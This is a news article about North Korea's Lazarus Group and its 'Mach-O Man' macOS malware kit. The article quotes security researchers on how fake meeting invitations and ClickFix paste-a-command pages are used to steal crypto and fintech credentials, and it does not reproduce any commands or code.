North Korea’s state-run Lazarus Group is running a new campaign known as “Mach-O Man” that turns routine business communications into a direct path to credential theft and data loss, security experts warned Wednesday.
The collective, with cumulative loot estimated at $6.7 billion since 2017, targets fintech, cryptocurrency and other high-net-worth executives and firms, Natalie Newson, a senior blockchain security researcher at CertiK, told CoinDesk on Wednesday.
In the past two weeks alone, the North Korean hackers have scooped up more than $500 million from Drift and the KelpDAO exploit in what appears to be a sustained campaign. The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors: “as a constant and well-funded threat, not just another headline,” she said.
“What makes Lazarus particularly dangerous right now is their level of activity,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-run financial operation running at a scale and speed typical of institutions.”
North Korea has turned crypto theft into a lucrative national industry, and Mach-O Man is just the latest product of that process, she said. While Lazarus created it, other cybercrime groups are also using it.
“It’s a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries tailored for Apple environments where crypto and fintech operate,” she said.
Newson said Mach-O Man uses a delivery method known as ClickFix. “It’s important to be clear because a lot of coverage is conflating two separate things,” she noted. ClickFix is a social engineering technique where the victim is asked to insert a command into their terminal to fix a simulated connection problem.
It works by having Lazarus send managers an “urgent” meeting invitation over Telegram for a Zoom, Microsoft Teams or Google Meet call, according to Mauro Eldritch, a security expert and founder of threat intelligence firm BCA Ltd.
The link leads to a fake but convincing website that instructs them to copy and paste a simple command into their Mac’s terminal to “fix a connection problem.” Thereby giving victims immediate access to the company’s systems, SaaS platforms and financial resources. By the time they find out they were taken advantage of, it’s usually too late.
There are several variations of this attack, said security threat researcher Vladimir S. den X. There are already cases where Lazarus attackers have hijacked decentralized finance project (DeFI) project domains with this new malware by replacing their websites with a fake message from Cloudflare asking them to enter a command to grant access.
“These fake ‘verification steps’ guide victims through keyboard shortcuts that run a malicious command,” Certik’s Newson said. “The site looks real, the instructions seem normal, and the victim initiates the action themselves – which is why traditional security controls often miss it.”
Most victims of this hack will not realize their security has been breached until the damage is done, by which time the malware has also already deleted itself.
“They probably don’t know yet,” she said. “If they do, they probably can’t identify which variant affected them.”
